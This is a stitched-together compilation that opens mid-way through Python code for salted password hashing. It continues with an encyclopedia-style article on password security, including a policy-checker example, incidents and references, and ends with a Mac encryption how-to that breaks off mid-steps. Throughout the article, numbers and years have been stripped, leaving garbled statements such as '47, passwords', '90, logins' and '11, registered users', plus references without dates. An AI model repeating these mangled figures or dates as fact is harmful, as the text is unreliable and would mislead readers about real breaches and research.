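    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def _parse(stored: str):
    """Split a stored verifier; returns None if it is malformed."""
    try:
        algorithm, iterations_s, salt_hex, digest_hex = stored.split("$")
        iterations = int(iterations_s)
        salt = bytes.fromhex(salt_hex)
        digest = bytes.fromhex(digest_hex)
    except ValueError:
        return None
    if algorithm != ALGORITHM or iterations < 1:
        return None
    return iterations, salt, digest


def check_password(password: str, stored: str) -> bool:
    """Recompute the derivation with the stored salt and cost, then compare
    in constant time. Malformed records are rejected, never matched."""
    parsed = _parse(stored)
    if parsed is None:
        return False
    iterations, salt, expected = parsed
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    salt, iterations)
    return hmac.compare_digest(candidate, expected)


def needs_rehash(stored: str, *, iterations: int = ITERATIONS) -> bool:
    """True when a record uses a lower cost than current policy, so it can be
    upgraded the next time the user logs in with the correct password."""
    parsed = _parse(stored)
    return parsed is None or parsed[0] < iterations


if __name__ == "__main__":
    # Constructed sample: two users who picked the same password.
    print(unsalted_sha1("password1") == unsalted_sha1("password1"))  # identical
    a, b = make_verifier("password1"), make_verifier("password1")
    print(a != b, check_password("password1", a), check_password("password1", b))
```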

Methods of verifying a password over a network

Simple transmission of the password

Passwords are vulnerable to interception (i.e., "snooping") while being transmitted to the authenticating machine or person. If the password is carried as electrical signals on unsecured physical wiring between the user access point and the central system controlling the password database, it is subject to snooping by wiretapping methods. If it is carried as packeted data over the Internet, anyone able to watch the packets containing the logon information can snoop with a very low probability of detection.

Email is sometimes used to distribute passwords but this is generally an insecure method. Since most email is sent as plaintext, a message containing a password is readable without effort during transport by any eavesdropper. Further, the message will be stored as plaintext on at least two computers: the sender's and the recipient's. If it passes through intermediate systems during its travels, it will probably be stored there as well, at least for some time, and may be copied to backup, cache or history files on any of these systems.

Using client-side encryption will only protect transmission from the mail handling system server to the client machine. Previous or subsequent relays of the email will not be protected and the email will probably be stored on multiple computers, certainly on the originating and receiving computers, most often in clear text.

Transmission through encrypted channels

The risk of interception of passwords sent over the Internet can be reduced by, among other approaches, using cryptographic protection. The most widely used is the Transport Layer Security (TLS, previously called SSL) feature built into most current Internet browsers. Most browsers alert the user of a TLS/SSL-protected exchange with a server by displaying a closed lock icon, or some other sign, when TLS is in use. There are several other techniques in use; see cryptography.

Hash-based challenge–response methods

Unfortunately, there is a conflict between stored hashed-passwords and hash-based challenge–response authentication; the latter requires a client to prove to a server that they know what the shared secret (i.e., password) is, and to do this, the server must be able to obtain the shared secret from its stored form. On many systems (including Unix-type systems) doing remote authentication, the shared secret usually becomes the hashed form and has the serious limitation of exposing passwords to offline guessing attacks. In addition, when the hash is used as a shared secret, an attacker does not need the original password to authenticate remotely; they only need the hash.

Zero-knowledge password proofs

Rather than transmitting a password, or transmitting the hash of the password, password-authenticated key agreement systems can perform a zero-knowledge password proof, which proves knowledge of the password without exposing it.

Moving a step further, augmented systems for password-authenticated key agreement (e.g., AMP, B-SPEKE, PAK-Z, SRP-6) avoid both the conflict and limitation of hash-based methods. An augmented system allows a client to prove knowledge of the password to a server, where the server knows only a (not exactly) hashed password, and where the unhashed password is required to gain access.

Procedures for changing passwords

Usually, a system must provide a way to change a password, either because a user believes the current password has been (or might have been) compromised, or as a precautionary measure. If a new password is passed to the system in unencrypted form, security can be lost (e.g., via wiretapping) before the new password can even be installed in the password database, and if the new password is given to a compromised employee, little is gained. Some websites include the user-selected password in an unencrypted confirmation e-mail message, with the obvious increased vulnerability.

Identity management systems are increasingly used to automate the issuance of replacements for lost passwords, a feature called self service password reset. The user's identity is verified by asking questions and comparing the answers to ones previously stored (i.e., when the account was opened).

Some password reset questions ask for personal information that could be found on social media, such as mother's maiden name. As a result, some security experts recommend either making up one's own questions or giving false answers.[35]

Password longevity

"Password aging" is a feature of some operating systems which forces users to change passwords frequently (e.g., quarterly, monthly or even more often). Such policies usually provoke user protest and foot-dragging at best and hostility at worst. There is often an increase in the number of people who note down the password and leave it where it can easily be found, as well as help desk calls to reset a forgotten password. Users may use simpler passwords or develop variation patterns on a consistent theme to keep their passwords memorable.[36] Because of these issues, there is some debate as to whether password aging is effective.[37] Changing a password will not prevent abuse in most cases, since the abuse would often be immediately noticeable. However, if someone may have had access to the password through some means, such as sharing a computer or breaching a different site, changing the password limits the window for abuse.[38]

Number of users per password

Allotting separate passwords to each user of a system is preferable to having a single password shared by legitimate users of the system, certainly from a security viewpoint. This is partly because users are more willing to tell another person (who may not be authorized) a shared password than one exclusively for their use. Single passwords are also much less convenient to change because many people need to be told at the same time, and they make removal of a particular user's access more difficult, as for instance on graduation or resignation. Separate logins are also often used for accountability, for example to know who changed a piece of data.

Password security architecture

Common techniques used to improve the security of computer systems protected by a password include:

  • Not displaying the password on the display as it is being entered or obscuring it as it is typed by using asterisks (*) or bullets (•).
  • Allowing passwords of adequate length. (Some legacy operating systems, including early versions of Unix and Windows, limited passwords to an 8 character maximum,[39][40][41] reducing security.)
  • Requiring users to re-enter their password after a period of inactivity (a semi log-off policy).
  • Enforcing a password policy to increase password strength and security.
    • Assigning randomly chosen passwords.
    • Requiring minimum password lengths.[28]
    • Some systems require characters from various character classes in a password—for example, "must have at least one uppercase and at least one lowercase letter". However, all-lowercase passwords are more secure per keystroke than mixed capitalization passwords.[42]
    • Employing a password blacklist to block the use of weak, easily guessed passwords.
    • Providing an alternative to keyboard entry (e.g., spoken passwords, or biometric identifiers).
    • Requiring more than one authentication system, such as two-factor authentication (something a user has and something the user knows).
  • Using encrypted tunnels or password-authenticated key agreement to prevent access to transmitted passwords via network attacks.
  • Limiting the number of allowed failures within a given time period (to prevent repeated password guessing). When the limit is reached, further attempts will fail (including correct password attempts) until the beginning of the next time period. However, this is vulnerable to a form of denial of service attack.
  • Introducing a delay between password submission attempts to slow down automated password guessing programs.

Some of the more stringent policy enforcement measures can pose a risk of alienating users, possibly decreasing security as a result.

Password reuse

It is common practice amongst computer users to reuse the same password on multiple sites. This presents a substantial security risk, because an attacker needs to only compromise a single site in order to gain access to other sites the victim uses. This problem is exacerbated by also reusing usernames, and by websites requiring email logins, as it makes it easier for an attacker to track a single user across multiple sites. Password reuse can be avoided or minimised by using mnemonic techniques, writing passwords down on paper, or using a password manager.[43]

It has been argued by Redmond researchers Dinei Florencio and Cormac Herley, together with Paul C. van Oorschot of Carleton University, Canada, that password reuse is inevitable, and that users should reuse passwords for low-security websites (which contain little personal data and no financial information, for example) and instead focus their efforts on remembering long, complex passwords for a few important accounts, such as bank accounts.[44] Similar arguments were made by Forbes for not changing passwords as often as many "experts" advise, due to the same limitations in human memory.[36]

Writing down passwords on paper

Historically, many security experts asked people to memorize their passwords: "Never write down a password". More recently, many security experts such as Bruce Schneier recommend that people use passwords that are too complicated to memorize, write them down on paper, and keep them in a wallet.[45][46][47][48][49][50][51]

Password manager software can also store passwords relatively safely, in an encrypted file sealed with a single master password.

After death

According to a survey by the University of London, one in ten people are now leaving their passwords in their wills to pass on this important information when they die. One-third of people, according to the poll, agree that their password-protected data is important enough to pass on in their will.[52]

Multi-factor authentication

Multi-factor authentication schemes combine passwords (as "knowledge factors") with one or more other means of authentication, to make authentication more secure and less vulnerable to compromised passwords. For example, a simple two-factor login might send a text message, e-mail, automated phone call, or similar alert whenever a login attempt is made, possibly supplying a code that must be entered in addition to a password.[53] More sophisticated factors include such things as hardware tokens and biometric security.

Password rules

Most organizations specify a password policy that sets requirements for the composition and usage of passwords, typically dictating minimum length, required categories (e.g., upper and lower case, numbers, and special characters), prohibited elements (e.g., use of one's own name, date of birth, address, telephone number). Some governments have national authentication frameworks[54] that define requirements for user authentication to government services, including requirements for passwords.

Many websites enforce standard rules such as minimum and maximum length, but also frequently include composition rules such as featuring at least one capital letter and at least one number/symbol. These latter, more specific rules were largely based on a report by the National Institute of Standards and Technology (NIST), authored by Bill Burr.[55] It originally proposed the practice of using numbers, obscure characters and capital letters and updating regularly. In a Wall Street Journal article, Burr reported he regrets these proposals and made a mistake when he recommended them.[56]

According to a rewrite of this NIST report, many websites have rules that actually have the opposite effect on the security of their users. This includes complex composition rules as well as forced password changes after certain periods of time. While these rules have long been widespread, they have also long been seen as annoying and ineffective by both users and cyber-security experts.[57] The NIST recommends people use longer phrases as passwords (and advises websites to raise the maximum password length) instead of hard-to-remember passwords with "illusory complexity" such as "pA55w+rd".[58] A user prevented from using the password "password" may simply choose "Password1" if required to include a number and uppercase letter. Combined with forced periodic password changes, this can lead to passwords that are difficult to remember but easy to crack.[55]

Paul Grassi, one of the NIST report's authors, further elaborated: "Everyone knows that an exclamation point is a 1, or an I, or the last character of a password. $ is an S or a 5. If we use these well-known tricks, we aren’t fooling any adversary. We are simply fooling the database that stores passwords into thinking the user did something good."[57]

Pieris Tsokkis and Eliana Stavrou were able to identify some bad password construction strategies through their research and development of a password generator tool. They came up with eight categories of password construction strategies based on exposed password lists, password cracking tools, and online reports citing the most used passwords. These categories include user-related information, keyboard combinations and patterns, placement strategy, word processing, substitution, capitalization, append dates, and a combination of the previous categories.[59]
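
The gap between a composition rule and a check that undoes the well-known substitution, capitalization and appended-digit tricks described above can be shown with a small policy checker. This is an added example, not code from the original article or from NIST; the minimum length, the blocklist entries, the substitution table and all function names are assumptions constructed for the illustration.

```python
import string

MIN_LENGTH = 8   # assumed minimum for this example

# Constructed sample blocklist; a real deployment would load a large list
# of common and previously exposed passwords.
BLOCKLIST = frozenset({"password", "qwerty", "letmein", "123456", "iloveyou"})

# Substitutions of the kind quoted in the text ('E' -> '3', 'I' -> '1',
# '$' for S, '!' for I), plus a few similar ones assumed here.
LEET = str.maketrans({
    "0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
    "@": "a", "$": "s", "!": "i", "+": "o",
})


def composition_rule_ok(password: str) -> bool:
    """Legacy-style rule: at least one uppercase, one lowercase, one digit."""
    return (any(c.isupper() for c in password)
            and any(c.islower() for c in password)
            and any(c.isdigit() for c in password))


def candidate_forms(password: str) -> set:
    """Forms to compare against the blocklist: lowercased, with trailing
    digits/punctuation removed, and each of those with substitutions undone."""
    lowered = password.lower()
    stripped = lowered.rstrip(string.digits + string.punctuation)
    forms = {lowered, stripped,
             lowered.translate(LEET), stripped.translate(LEET)}
    forms.discard("")
    return forms


def evaluate(password: str, username: str = "") -> list:
    """Return the reasons a password is rejected; an empty list means accepted.
    No character-class requirement is applied."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append("too-short")
    forms = candidate_forms(password)
    if forms & BLOCKLIST:
        reasons.append("blocklisted")
    name = username.lower()
    if name and any(name in form for form in forms):
        reasons.append("contains-username")
    return reasons


if __name__ == "__main__":
    samples = ["pA55w+rd", "Password1", "P@ssw0rd!", "Alice2024!",
               "correct horse battery staple"]
    for pw in samples:
        print(f"{pw!r}: composition rule passes={composition_rule_ok(pw)}, "
              f"rejected for={evaluate(pw, username='alice')}")
```

"Password1" and "pA55w+rd" satisfy the composition rule yet reduce to a blocklisted word, while the long lowercase passphrase fails the composition rule and passes the length and blocklist checks.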

Password cracking

Attempting to crack passwords by trying as many possibilities as time and money permit is a brute force attack. A related method, rather more efficient in most cases, is a dictionary attack. In a dictionary attack, all words in one or more dictionaries are tested. Lists of common passwords are also typically tested.

Password strength is the likelihood that a password cannot be guessed or discovered, and varies with the attack algorithm used. Cryptologists and computer scientists often refer to the strength or 'hardness' in terms of entropy.[14]

Passwords easily discovered are termed weak or vulnerable; passwords very difficult or impossible to discover are considered strong. There are several programs available for password attack (or even auditing and recovery by systems personnel) such as L0phtCrack, John the Ripper, and Cain; some of which use password design vulnerabilities (as found in the Microsoft LANManager system) to increase efficiency. These programs are sometimes used by system administrators to detect weak passwords proposed by users.

Studies of production computer systems have consistently shown that a large fraction of all user-chosen passwords are readily guessed automatically. For example, Columbia University found 22% of user passwords could be recovered with little effort.[60] According to Bruce Schneier, examining data from a phishing attack, 55% of MySpace passwords would be crackable in 8 hours using a commercially available Password Recovery Toolkit capable of testingpasswords per second in [61] He also reported that the single most common password was password1, confirming yet again the general lack of informed care in choosing passwords among users. (He nevertheless maintained, based on these data, that the general quality of passwords has improved over the years—for example, average length was up to eight characters from under seven in previous surveys, and less than 4% were dictionary words.[62])

Incidents

  • On July 16,CERT reported an incident where an attacker had foundencrypted passwords. At the time the attacker was discovered, 47, passwords had already been cracked.[63]
  • In September,after the deaths of New York employees in the September 11 attacks, financial services firm Cantor Fitzgerald through Microsoft broke the passwords of deceased employees to gain access to files needed for servicing client accounts.[64] Technicians used brute-force attacks, and interviewers contacted families to gather personalized information that might reduce the search time for weaker passwords.[64]
  • In Decembera major password breach of the shoppingdowntown.us website occurred that led to the release of 32 million passwords. The hacker then leaked the full list of the 32 million passwords (with no other identifiable information) to the Internet. Passwords were stored in cleartext in the database and were extracted through a SQL injection vulnerability. The Imperva Application Defense Center (ADC) did an analysis on the strength of the passwords.[65]
  • In JuneNATO (North Atlantic Treaty Organization) experienced a security breach that led to the public release of first and last names, usernames, and passwords for more than 11, registered users of their e-bookshop. The data was leaked as part of Operation AntiSec, a movement that includes Anonymous, LulzSec, as well as other hacking groups and individuals. The aim of AntiSec is to expose personal, sensitive, and restricted information to the world, using any means necessary.[66]
  • On July 11,Booz Allen Hamilton, a consulting firm that does work for the Pentagon, had their servers hacked by Anonymous and leaked the same day. "The leak, dubbed 'Military Meltdown Monday,' includes 90, logins of military personnel—including personnel from USCENTCOM, SOCOM, the Marine corps, various Air Force facilities, Homeland Security, State Department staff, and what looks like private sector contractors."[67] These leaked passwords wound up being hashed in SHA1, and were later decrypted and analyzed by the ADC team at Imperva, revealing that even military personnel look for shortcuts and ways around the password requirements.[68]

Alternatives to passwords for authentication

The numerous ways in which permanent or semi-permanent passwords can be compromised have prompted the development of other techniques. Unfortunately, some are inadequate in practice, and in any case few have become universally available for users seeking a more secure alternative. A paper[69] examines why passwords have proved so hard to supplant (despite numerous predictions that they would soon be a thing of the past[70]); in examining thirty representative proposed replacements with respect to security, usability and deployability they conclude "none even retains the full set of benefits that legacy passwords already provide."

  • Single-use passwords. Having passwords that are only valid once makes many potential attacks ineffective. Most users find single-use passwords extremely inconvenient. They have, however, been widely implemented in personal online banking, where they are known as Transaction Authentication Numbers (TANs). As most home users only perform a small number of transactions each week, the single-use issue has not led to intolerable customer dissatisfaction in this case.
  • Time-synchronized one-time passwords are similar in some ways to single-use passwords, but the value to be entered is displayed on a small (generally pocketable) item and changes every minute or so.
  • PassWindow one-time passwords are used as single-use passwords, but the dynamic characters to be entered are visible only when a user superimposes a unique printed visual key over a server-generated challenge image shown on the user's screen.
  • Access controls based on public-key cryptography e.g. ssh. The necessary keys are usually too large to memorize (but see proposal Passmaze)[71] and must be stored on a local computer, security token or portable memory device, such as a USB flash drive or even floppy disk. The private key may be stored on a cloud service provider, and activated by the use of a password or two-factor authentication.
  • Biometric methods promise authentication based on unalterable personal characteristics, but currently have high error rates and require additional hardware to scan,[needs update] for example, fingerprints, irises, etc. They have proven easy to spoof in some famous incidents testing commercially available systems, for example, the gummie fingerprint spoof demonstration,[72] and, because these characteristics are unalterable, they cannot be changed if compromised; this is a highly important consideration in access control as a compromised access token is necessarily insecure.
  • Single sign-on technology is claimed to eliminate the need for having multiple passwords. Such schemes do not relieve users and administrators from choosing reasonable single passwords, nor system designers or administrators from ensuring that private access control information passed among systems enabling single sign-on is secure against attack. As yet, no satisfactory standard has been developed.
  • Envaulting technology is a password-free way to secure data on removable storage devices such as USB flash drives. Instead of user passwords, access control is based on the user's access to a network resource.
  • Non-text-based passwords, such as graphical passwords or mouse-movement based passwords.[73] Graphical passwords are an alternative means of authentication for log-in intended to be used in place of conventional password; they use images, graphics or colours instead of letters, digits or special characters. One system requires users to select a series of faces as a password, utilizing the human brain's ability to recall faces easily.[74] In some implementations the user is required to pick from a series of images in the correct sequence in order to gain access.[75] Another graphical password solution creates a one-time password using a randomly generated grid of images. Each time the user is required to authenticate, they look for the images that fit their pre-chosen categories and enter the randomly generated alphanumeric character that appears in the image to form the one-time password.[76][77] So far, graphical passwords are promising, but are not widely used. Studies on this subject have been made to determine its usability in the real world. While some believe that graphical passwords would be harder to crack, others suggest that people will be just as likely to pick common images or sequences as they are to pick common passwords.[citation needed]
  • 2D Key (2-Dimensional Key)[78] is a 2D matrix-like key input method having the key styles of multiline passphrase, crossword, ASCII/Unicode art, with optional textual semantic noises, to create big password/key beyond bits to realize the MePKC (Memorizable Public-Key Cryptography)[79] using fully memorizable private key upon the current private key management technologies like encrypted private key, split private key, and roaming private key.
  • Cognitive passwords use question and answer cue/response pairs to verify identity.

"The password is dead"

That "the password is dead" is a recurring idea in computer security. The reasons given often include reference to the usability as well as security problems of passwords. It often accompanies arguments that the replacement of passwords by a more secure means of authentication is both necessary and imminent. This claim has been made by numerous people at least since [70][80][81][82][83][84][85][86]

Alternatives to passwords include biometrics, two-factor authentication or single sign-on, Microsoft's Cardspace, the Higgins project, the Liberty Alliance, NSTIC, the FIDO Alliance and various Identity proposals.[87][88]

However, in spite of these predictions and efforts to replace them, passwords are still the dominant form of authentication on the web. In "The Persistence of Passwords," Cormac Herley and Paul van Oorschot suggest that every effort should be made to end the "spectacularly incorrect assumption" that passwords are dead.[89] They argue that "no other single technology matches their combination of cost, immediacy and convenience" and that "passwords are themselves the best fit for many of the scenarios in which they are currently used."

Following this, Bonneau et al. systematically compared web passwords to 35 competing authentication schemes in terms of their usability, deployability, and security.[90][91] Their analysis shows that most schemes do better than passwords on security, some schemes do better and some worse with respect to usability, while every scheme does worse than passwords on deployability. The authors conclude with the following observation: "Marginal gains are often not sufficient to reach the activation energy necessary to overcome significant transition costs, which may provide the best explanation of why we are likely to live considerably longer before seeing the funeral procession for passwords arrive at the cemetery."

References

  1. "passcode". YourDictionary. Retrieved 17 May
  2. Williams, Shannon (21 Oct). "Average person has passwords - study". NordPass. Retrieved April 28
  3. Grassi, Paul A.; Garcia, Michael E.; Fenton, James L. (June). "NIST Special Publication Digital Identity Guidelines". National Institute of Standards and Technology (NIST). Retrieved 17 May
  4. "authentication protocol". Computer Security Resource Center (NIST). Retrieved 17 May
  5. "Passphrase". Computer Security Resource Center (NIST). Retrieved 17 May
  6. Polybius on the Roman Military. Archived at the Wayback Machine.
  7. Mark Bando. st Airborne: The Screaming Eagles in World War II. Mbi Publishing Company. Archived from the original on 2 June. Retrieved 20 May
  8. McMillan, Robert (27 January). "The World's First Computer Password? It Was Useless Too". Wired magazine. Retrieved 22 March
  9. Hunt, Troy (26 July). "Passwords Evolved: Authentication Guidance for the Modern Era". Retrieved 22 March
  10. CTSS Programmers Guide, 2nd Ed., MIT Press
  11. Morris, Robert; Thompson, Ken. "Password Security: A Case History". Bell Laboratories.
  12. Vance, Ashlee. "If Your Password IsJust Make It HackMe". The New York Times. Archived from the original.
  13. "Managing Network Security". Archived from the original on March 2. Fred Cohen and Associates.
  14. Lundin, Leigh. "PINs and Passwords, Part 2". Passwords. Orlando: SleuthSayers.
  15. The Memorability and Security of Passwords. Archived at the Wayback Machine (pdf).
  16. Michael E. Whitman; Herbert J. Mattord. Principles of Information Security. Cengage Learning.
  17. "How to Create a Random Password Generator". PCMAG.
  18. Lewis, Dave. Ctrl-Alt-Delete. Retrieved 10 July
  19. Techlicious / Fox Van Allen @techlicious. "Google Reveals the 10 Worst Password Ideas". Archived from the original.
  20. Fleishman, Glenn (November 24). "Write your passwords down to improve safety — A counter-intuitive notion leaves you less vulnerable to remote attack, not more". MacWorld. Retrieved April 28
  21. Lyquix Blog: Do We Need to Hide Passwords? Archived at the Wayback Machine.
  22. Jonathan Kent. Malaysia car thieves steal finger. Archived at the Wayback Machine. BBC
  23. Stuart Brown. "Top ten passwords used in the United Kingdom". Archived from the original on November 8.
  24. US patent
  25. Wilkes, M. V. Time-Sharing Computer Systems. American Elsevier, New York.
  26. Schofield, Jack (10 March). "Roger Needham". The Guardian.
  27. The Bug Charmer: Passwords Matter. Archived at the Wayback Machine.
  28. Alexander, Steven. The Bug Charmer: How long should passwords be? Archived at the Wayback Machine.
  29. "Password Hashing Schemes". Archived at the Wayback Machine.
  30. Florencio et al., An Administrator's Guide to Internet Password Research. Archived at the Wayback Machine (pdf).
  31. Cracking Story – How I Cracked Over Million SHA1 and MD5 Hashed Passwords « Thireus' Bl0g. Archived at the Wayback Machine.
  32. Morris, Robert & Thompson, Ken. "Password Security: A Case History". Communications of the ACM. 22 (11). Archived from the original.
  33. Password Protection for Modern Operating Systems. Archived at the Wayback Machine (pdf).
  34. How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases. Archived at the Wayback Machine.
  35. "Why You Should Lie When Setting Up Password Security Questions". Techlicious. Archived from the original.
  36. Joseph Steinberg (12 November). "Forbes: Why You Should Ignore Everything You Have Been Told About Choosing Passwords". Forbes. Archived from the original on 12 November. Retrieved 12 November
  37. "The problems with forcing regular password expiry". IA Matters. CESG: the Information Security Arm of GCHQ. 15 April. Archived from the original on 17 August. Retrieved 5 Aug
  38. Schneier on Security discussion on changing passwords. Archived at the Wayback Machine.
  39. Seltzer, Larry. "American Express: Strong Credit, Weak Passwords". Archived at the Wayback Machine.
  40. "Ten Windows Password Myths". Archived at the Wayback Machine: "NT dialog boxes limited passwords to a maximum of 14 characters"
  41. "You must provide a password between 1 and 8 characters in length". Archived May 21, at the Wayback Machine
  42. "To Capitalize or Not to Capitalize?" Archived at the Wayback Machine.
  43. Thomas, Keir (February 10). "Password Reuse Is All Too Common, Research Shows". PC World. Archived from the original on August 12. Retrieved August 10
  44. Pauli, Darren (16 July). "Microsoft: You NEED bad passwords and should re-use them a lot". The Register. Archived from the original on 12 August. Retrieved 10 August
  45. Bruce Schneier: Crypto-Gram Newsletter. Archived at the Wayback Machine. May 15
  46. "Ten Windows Password Myths". Archived at the Wayback Machine: Myth #7. You Should Never Write Down Your Password
  47. Kotadia, Munir. Microsoft security guru: Jot down your passwords.
  48. "The Strong Password Dilemma". Archived at the Wayback Machine. Richard E. Smith: "we can summarize classical password selection rules as follows: The password must be impossible to remember and never written down."
  49. Bob Jenkins. "Choosing Random Passwords". Archived from the original.
  50. "The Memorability and Security of Passwords – Some Empirical Results". Archived at the Wayback Machine (pdf)
    "your password in a secure place, such as the back of your wallet or purse."
  51. "Should I write down my passphrase?" Archived at the Wayback Machine.
  52. Jaffery, Saman M. (17 October). "Survey: 11% of Brits Include Internet Passwords in Will". Hull & Hull LLP. Archived from the original on 25 December. Retrieved 16 July
  53. Two-factor authentication. Archived at the Wayback Machine
  54. Improving Usability of Password Management with Standardized Password Policies. Archived at the Wayback Machine (pdf).
  55. Hate silly password rules? So does the guy who created them, ZDNet
  56. The Man Who Wrote Those Password Rules Has a New Tip: N3v$r M1^d!, Wall Street Journal
  57. Experts Say We Can Finally Ditch Those Stupid Password Rules, Fortune
  58. NIST’s new password rules – what you need to know, Naked Security
  59. P. Tsokkis and E. Stavrou, "A password generator tool to increase users' awareness on bad password construction strategies," International Symposium on Networks, Computers and Communications (ISNCC), Rome.
  60. "Password". Archived from the original on April 23.
  61. Schneier, Real-World Passwords. Archived at the Wayback Machine.
  62. MySpace Passwords Aren't So Dumb. Archived at the Wayback Machine.
  63. "CERT IN".
  64. Urbina, Ian; Davis, Leslye (November 23). "The Secret Life of Passwords". The New York Times. Archived from the original on November 28.
  65. "Consumer Password Worst Practices (pdf)" (PDF). Archived (PDF) from the original.
  66. "NATO site hacked". The Register. Archived from the original on June 29. Retrieved July 24
  67. "Anonymous Leaks 90, Military Email Accounts in Latest Antisec Attack". Archived from the original.
  68. "Military Password Analysis". Archived from the original.
  69. "The Quest to Replace Passwords (pdf)" (PDF). IEEE. Archived (PDF) from the original.
  70. "Gates predicts death of the password". CNET. Archived from the original.
  71. Cryptology ePrint Archive: Report /. Archived at the Wayback Machine.
  72. T Matsumoto. H Matsumotot; K Yamada & S Hoshino. "Impact of artificial 'Gummy' Fingers on Fingerprint Systems". Proc SPIE. Optical Security and Counterfeit Deterrence Techniques IV.
  73. Using AJAX for Image Passwords – AJAX Security Part 1 of 3. Archived at the Wayback Machine.
  74. Butler, Rick A. Face in the Crowd. Archived at the Wayback Machine.
  75. graphical password or graphical user authentication (GUA). Archived at the Wayback Machine.
  76. Ericka Chickowski. "Images Could Change the Authentication Picture". Dark Reading. Archived from the original.
  77. "Confident Technologies Delivers Image-Based, Multifactor Authentication to Strengthen Passwords on Public-Facing Websites". Archived from the original.
  78. User Manual for 2-Dimensional Key (2D Key) Input Method and System. Archived at the Wayback Machine.
  79. Kok-Wah Lee. "Methods and Systems to Create Big Memorizable Secrets and Their Applications". Patent US, WO. Archived at the Wayback Machine. Filing date: December 18
  80. Kotadia, Munir (25 February). "Gates predicts death of the password". ZDNet. Retrieved 8 May
  81. "IBM Reveals Five Innovations That Will Change Our Lives within Five Years". IBM. Archived from the original.
  82. Honan, Mat. "Kill the Password: Why a String of Characters Can't Protect Us Anymore". Wired. Archived from the original.
  83. "Google security exec: 'Passwords are dead'". CNET. Archived from the original.
  84. "Authentication at Scale". IEEE. Archived from the original.
  85. Mims, Christopher. "The Password Is Finally Dying. Here's Mine". Wall Street Journal. Archived from the original.
  86. "Russian credential theft shows why the password is dead". Computer World. Archived from the original.
  87. "NSTIC head Jeremy Grant wants to kill passwords". Fedscoop. Archived from the original.
  88. "Specifications Overview". FIDO Alliance. Archived from the original.
  89. "A Research Agenda Acknowledging the Persistence of Passwords". IEEE Security&Privacy. Jan. Archived from the original.
  90. Bonneau, Joseph; Herley, Cormac; Oorschot, Paul C. van; Stajano, Frank. "The Quest to Replace Passwords: A Framework for Comparative Evaluation of Web Authentication Schemes". Technical Report - University of Cambridge. Computer Laboratory. Cambridge, UK: University of Cambridge Computer Laboratory. Retrieved 22 March
  91. Bonneau, Joseph; Herley, Cormac; Oorschot, Paul C. van; Stajano, Frank. The Quest to Replace Passwords: A Framework for Comparative Evaluation of Web Authentication Schemes. IEEE Symposium on Security and Privacy. San Francisco, CA.


How to Encrypt and Password Protect Files on Your Mac

Posted on April 16th, by Jay Vrijenhoek and Kirk McElhearn

To protect your sensitive data, you should use encryption and password protection wherever possible; macOS provides you with a number of ways to implement it. Best of all, you can do this with built-in software and features that are part of macOS.

This article covers five areas where you can encrypt or password protect files:

  1. Encrypt System Data and Your Startup Drive
  2. Encrypt External Drives
  3. Encrypt Documents and Files
  4. Encrypt Files You Send to Others

Encrypt System Data and Your Startup Drive

The best way to prevent unauthorized access to your data is to encrypt your startup drive. But you should also set a password to protect your Mac when the screensaver is active, and you can set a firmware password to prevent someone from starting up your Mac from an external drive.

Using FileVault to Encrypt Your Startup Drive

FileVault, the built-in full-disk encryption feature in macOS, is a robust way to encrypt the contents of your entire startup drive. It is important to use a strong password to secure your user account, because that password not only gives you access to your account, but it also unlocks your drive. A simple password ("password1," etc.) is easy to guess and will allow anyone to log in, thus bypassing FileVault protection.

To enable FileVault, follow these steps:

  1. From the Apple menu, choose System Preferences.
  2. Go to the Security & Privacy pane.
  3. Click the FileVault tab.
  4. Click the padlock to make changes, then click Turn On FileVault…

    You will be asked to choose a method to unlock your disk if you ever lose your account password.

    If you choose to use your iCloud account, Apple will store the recovery key for your disk on its servers, and you'll have to provide questions and answers for three security questions that will unlock the disk.

    The recovery key method is more secure, since if someone gets access to your user data, they may have your Apple ID and its password, but you have to make sure that you can store it safely. If you use a password manager, you can store it there, and you'll be able to access it from your iPhone or iPad if necessary.

    If you select the iCloud option, you will be prompted to restart your Mac and the encryption process will begin. However, if you select recovery key, an additional window will show with that key.

  5. The encryption process will begin, and you can use your Mac as you always would. You probably won't notice any performance hit as FileVault encrypts your disk, and, depending on the size of your Mac's drive, this will take from a few hours to overnight. Your Mac has to be plugged in for the encryption process to advance, so if you have a laptop make sure to connect it to power. And encryption only occurs when the Mac is awake.
    In the future, you'll have to log into your Mac each time you start it up, and each time you wake it from sleep. You can't use automatic login on a Mac with FileVault.

Activating a Screensaver Password

FileVault protects your data at rest, meaning if the Mac is off, sleeping or you are logged out, a password is required to get access. Once you are logged in, the data is accessible to you or anyone else who can sit at your Mac while you're not looking. To prevent this, you should set a password so when your Mac is asleep, or when a screensaver is active, a password is required to access the Mac. And if you set a password like this, it's easy to lock your Mac, without even clicking your mouse.

To enable the sleep and screensaver password, follow these steps:

    1. From the Apple menu, choose System Preferences.
    2. Go to the Security & Privacy pane.
    3. Click the General tab.
    4. Click the padlock to make changes, then check the Require password — after sleep or screen saver begins. The dropdown menu offers you options as to how soon the password protection should kick in. It's best to choose immediately here; that way, you don't have to worry about how long it takes before your Mac is protected. And if you choose this setting, you can set a hot corner that will activate your screen saver when your mouse pointer reaches a specified corner of your display.

      To do this, go back to the Desktop & Screen Saver pane of System Preferences. Click the Screen Saver tab, then, at the bottom of the window, click the Hot Corners… button.

Hot corner actions occur when you move your cursor into one of the corners of your screen. As you can see below, I have four actions set for the four corners of my display. At the top left is Put Display to Sleep. Since my security settings require a password immediately after the display is asleep, this provides instant protection from prying eyes.

You can also put your Mac to sleep by pressing Option–Command–Media Eject, if you want, but if you leave it running with the screen saver, then operations can continue while you're away from your Mac.

Setting a Firmware Password

To prevent unauthorized users from starting up your Mac from another drive, or from the recovery partition, you can set a firmware password. Once set, when you start your Mac from your normal startup disk, you see the normal login window where you enter your user account password. If you try to start up from another drive, or from macOS Recovery, your Mac pauses startup and displays a lock icon with a password field instead.

However, you can only set a firmware password on an Intel Mac; the new Macs with Apple's own processors do not support this. Apple recommends the use of FileVault to protect your data on these Macs, and, to be honest, if you are using FileVault even on an Intel Mac, you probably don't need a firmware password.

To set a firmware password, follow these steps:

